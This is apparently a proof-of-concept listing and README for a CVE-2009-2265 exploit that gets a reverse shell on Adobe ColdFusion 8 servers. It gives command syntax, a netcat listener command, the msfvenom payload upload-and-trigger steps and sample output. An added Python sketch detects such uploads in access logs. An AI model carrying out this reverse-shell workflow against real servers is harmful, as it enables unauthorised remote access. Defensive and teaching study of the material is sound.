CVE-2009-2265 PoC — FCKeditor Path Traversal Vulnerability

Source
Associated Vulnerability
Title: FCKeditor Path Traversal Vulnerability (CVE-2009-2265)
Description: FCKeditor is an open-source editor, built by an individual developer, for editing HTML in web pages. The editor/filemanager/browser/default/connectors/php/connector.php module of FCKeditor contains a path traversal vulnerability: 147.function FileUpload( $resourceType, $currentFolder ) 148.{ 149.$sErrorNumber = '0' ; 150.$sFileName = '' ; 151. 152.if ( isse
Description
Adobe ColdFusion 8 - Remote Command Execution (RCE)
Readme
# Adobe ColdFusion 8 - Remote Command Execution (RCE) Exploit

### **Overview**
This exploit targets a known vulnerability in Adobe ColdFusion 8 (CVE-2009-2265). It enables remote command execution (RCE) by uploading a malicious JSP payload that establishes a reverse shell connection.

---

### **Exploit Details**
- **CVE**: [CVE-2009-2265](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265)
- **Vulnerability**: Improper handling of file uploads in Adobe ColdFusion 8.
- **Affected Versions**: Adobe ColdFusion 8.
- **Impact**: Allows attackers to execute arbitrary commands on the server.

---

### **Features**
1. Automatically generates a JSP payload using `msfvenom`.
2. Uploads the payload using a multipart POST request.
3. Triggers the payload to establish a reverse shell.
4. Automatically cleans up the local payload files after execution.

---

### **Usage**
To use this exploit, you need the following:
- A Kali Linux machine or a similar penetration testing environment.
- Netcat installed for listening on the specified port.
- A vulnerable Adobe ColdFusion 8 server.

---

### **Command Syntax**
```bash
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
```

#### **Arguments**
- `-l <LHOST>`: Local attacker IP (e.g., 10.10.16.5).
- `-p <LPORT>`: Local attacker port for the reverse shell (e.g., 9001).
- `-r <RHOST>`: Remote target IP (e.g., 10.10.10.11).
- `-q <RPORT>`: Remote target port where ColdFusion is running (e.g., 8500).

---

### **Example Usage**
```bash
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
```

1. Start a listener on your attacker machine:
   ```bash
   nc -lnvp 9001
   ```

2. Run the exploit with the appropriate arguments.

3. Once executed, the payload will connect back to your listener.

---

### **How It Works**
1. **Generate Payload**:
   - The script uses `msfvenom` to generate a malicious JSP payload.
   - The payload initiates a reverse shell to the specified LHOST and LPORT.

2. **Upload Payload**:
   - The payload is uploaded to the vulnerable ColdFusion server using a POST request.

3. **Trigger Payload**:
   - The uploaded payload is executed by sending a GET request to the file's URL.

4. **Establish Reverse Shell**:
   - A reverse shell is established, giving the attacker access to the target system.

---

### **Requirements**
- `msfvenom` for payload generation.
- `curl` for file upload and triggering the payload.
- `nc` (Netcat) for listening to reverse shell connections.

---

### **Example Output**
```plaintext
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
```
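
From the defender's side, the upload-then-trigger sequence under "How It Works" leaves a recognizable trace in web access logs: a POST from a client, followed shortly by a GET for a server-executable file under the `/userfiles/` upload path shown in the server response above. The following detection sketch is an added example, not part of the original README or the author's script. It assumes common-log-format lines; the log lines, the `/upload-endpoint` placeholder path, the extension list and the 5-minute window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines; "/upload-endpoint" is a placeholder path.
SAMPLE_LOG = """\
10.10.16.5 - - [12/Mar/2024:10:15:01 +0000] "POST /upload-endpoint HTTP/1.1" 200 312
10.10.16.5 - - [12/Mar/2024:10:15:09 +0000] "GET /userfiles/file/abcd1234.jsp HTTP/1.1" 200 0
192.0.2.44 - - [12/Mar/2024:10:16:30 +0000] "GET /userfiles/file/report.pdf HTTP/1.1" 200 48211
192.0.2.77 - - [12/Mar/2024:11:02:10 +0000] "GET /userfiles/file/old.jsp HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_DIR = "/userfiles/"  # upload directory seen in the server response above
SCRIPT_EXTS = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")  # assumption: types the server executes
WINDOW = timedelta(minutes=5)  # assumption: POST-to-GET correlation window


def find_upload_execution(log_text):
    """Flag requests for executable scripts under the upload directory."""
    last_post = {}  # client IP -> time of its most recent POST
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip = m["ip"]
        # Drop query string and path parameters before checking the extension.
        path = re.split(r"[?;]", m["path"], maxsplit=1)[0].lower()
        if m["method"] == "POST":
            last_post[ip] = ts
            continue
        if not (path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXTS)):
            continue
        served = m["status"] == "200"
        recent_post = ip in last_post and ts - last_post[ip] <= WINDOW
        # A served script right after a POST from the same client is the strongest signal.
        severity = "high" if served and recent_post else "medium"
        findings.append((severity, ip, path, int(m["status"])))
    return findings


if __name__ == "__main__":
    for finding in find_upload_execution(SAMPLE_LOG):
        print(finding)
```

Any script file served from an upload directory deserves review on its own; the POST correlation only raises the priority of the finding.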

---

### **Disclaimer**
This script is for **educational purposes only**. Use it on systems you own or have explicit permission to test. Unauthorized use of this exploit on systems you do not own is illegal and unethical.

--- 

### **Author**
Developed by [0xDTC].
File Snapshot

```plaintext
[4.0K]  /data/pocs/56b7e5c180efdf6a3fa7719ae0b72e00fa5405f0
├── [3.5K]  CVE-2009-2265
└── [3.4K]  README.md

0 directories, 2 files
```